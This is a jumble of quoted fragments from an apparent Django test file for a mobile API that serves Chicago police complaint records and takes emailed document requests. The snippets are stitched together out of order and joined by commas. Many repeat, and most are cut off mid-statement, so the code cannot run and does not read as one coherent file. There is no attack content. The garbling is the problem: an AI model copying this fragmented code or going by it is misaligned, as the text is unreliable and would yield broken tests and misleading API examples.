allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory(", "'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "'8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000',", "Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator',", "1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document',", "allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def", "import APITestCase from rest_framework import status from robber import expect import pytz from", "'<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator',", "28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR',", "expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response", "current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456',", "mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK)", "disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment'", "PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from", "'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer',", "CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln", "first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789',", "expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', )", "} ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28',", "from robber import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory,", "appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345',", "'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000',", ") OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28,", "investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1,", "allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave',", "investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None )", "'8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000',", "age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory(", "}, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr':", "subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation", "sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2,", "}) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({", "test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White',", "complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001,", "final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' )", "'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', }", "2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory(", "point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System',", "document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/',", "'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26',", "5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward',", "AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR", "expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response", "'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat':", "tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3,", "tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation,", "'123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email')", "kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233'", "Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [", "officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1,", "final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator", "'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 =", "allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28),", "enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND)", "'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male',", "AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin", "internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12,", "expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response =", "= InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/',", "gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation',", "age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3,", "{ 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000',", "investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory(", "OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD',", "InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation,", "AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from", "@patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email':", "response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel", "allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis',", "gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1,", ") AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data()", "'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge':", "added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST)", "from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory", "= self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response =", "1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "'<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self):", "expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}),", ") OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False )", "test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a", "allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category':", "'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male',", "{ 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000',", "id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer,", "'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url':", "'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type':", "'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian':", "{ 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000',", "'<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [", "'<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>',", "= AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document',", "'9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>',", "date from django.urls import reverse from django.contrib.gis.geos import Point from mock import patch", "{'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self):", "1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation", "4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, {", "5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28),", "1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28),", "django.urls import reverse from django.contrib.gis.geos import Point from mock import patch from rest_framework.test", "id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory(", "[ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count':", "id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3", "'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000',", "'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments':", "'<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness',", "'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000',", "'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self):", "last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory(", "gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003,", "civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345',", "test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2", "'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1,", ") officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1,", ") from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager,", "point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System',", "Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name':", "sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7,", "'12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ {", "OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, )", "'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', }", "robber import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory,", "'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18", "last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS',", "Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation':", "'5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/',", "attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}),", "Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ {", "rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1,", "Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9,", "'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id':", "test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White',", "crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications", "complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 =", "Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5,", "start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2", "= OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0,", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28),", "import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory,", "}) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email):", "current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory(", "'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ {", "], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date':", "first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3,", "'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>',", "'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document',", "id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({", "'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR", "def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} )", "mock import patch from rest_framework.test import APITestCase from rest_framework import status from robber", "'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln", "'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area =", "1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document',", "'1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender':", "26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation,", "}, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding':", "'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({", "'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal':", "star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False", "pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email':", "3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black',", "2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 =", "'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': 